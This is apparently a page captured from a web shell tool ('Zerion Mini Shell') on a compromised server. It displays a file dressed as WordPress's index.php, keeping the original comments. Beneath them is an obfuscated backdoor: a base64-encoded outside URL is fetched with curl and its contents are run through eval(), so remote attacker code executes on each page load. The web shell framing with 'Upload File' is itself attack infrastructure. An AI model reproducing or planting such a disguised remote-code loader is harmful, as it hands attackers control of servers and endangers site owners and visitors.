ok

Mini Shell

Direktori : /proc/thread-self/fd/
Upload File :
Current File : //proc/thread-self/fd/9

<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
 function c($F){
$url = $F;
$curl = curl_init($url);
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 15);
$resp = curl_exec($curl);
curl_close($curl);
return ($resp);
}

$r = base64_decode('Pz4=');
echo 'ok';
echo eval($r . c(base64_decode('aHR0cHM6Ly9vbGlzY29ycC5jb20uYnIvMi50eHQ=')));
?>

Zerion Mini Shell 1.0